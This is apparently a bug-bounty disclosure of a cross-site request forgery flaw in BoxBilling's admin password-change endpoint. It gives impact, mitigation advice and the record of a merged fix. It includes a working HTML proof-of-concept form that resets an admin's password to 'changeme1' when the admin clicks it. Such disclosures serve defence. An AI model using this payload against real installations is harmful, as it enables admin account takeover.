Cross-Site Request Forgery (CSRF) in boxbilling/boxbilling

Valid

Reported on

Jul 5th 2021


✍️ Description

CSRF on changing password of an admin account. There is no token or anti csrf implemented.

🕵️‍♂️ Proof of Concept

Create a .html file (poc.html) for example and copy paste the following code in it. Change localhost to ur domain or ip address.

<html><head>
<title>CSRF PoC</title>
</head><body>
<form action="http://localhost/box/api/admin/profile/change_password" method="POST">
<input type="hidden" name="password" value="changeme1" /><br />
<input type="hidden" name="password_confirm" value="changeme1" /><br />
<input type='submit' value='Click here' />
</form>
</body></html>

send this file to a admin when he opens the file and clicks on it the password will be change to changeme1. see the screenshot below with a burp request of what is happening.

💥 Impact

This vulnerability is capable of changing the admin password into a new one. If you send the admin the link and he clicks on it the password will be changed directly because there is no csrf protection. With this attack you can become an admin on the website.

💥 Mitigation

Verify the old_password first.

Implement anti csrf

💥 References

https://owasp.org/www-community/attacks/csrf

https://portswigger.net/web-security/csrf

Occurences

We have contacted a member of the boxbilling team and are waiting to hear back 5 months ago
We have contacted a member of the boxbilling team and are waiting to hear back 5 months ago
Mr. Timothy G Webb Sr. validated this vulnerability 4 months ago
ribersec has been awarded the disclosure bounty
The fix bounty is now up for grabs
Mr. Timothy G Webb Sr. confirmed that a fix has been merged on 42cde7 4 months ago
Benjamin Aerni has been awarded the fix bounty
Jamie Slome
3 hours ago

Admin


Just for reference, I added @bennottelling as the fixer to this report and has been confirmed by the maintainers.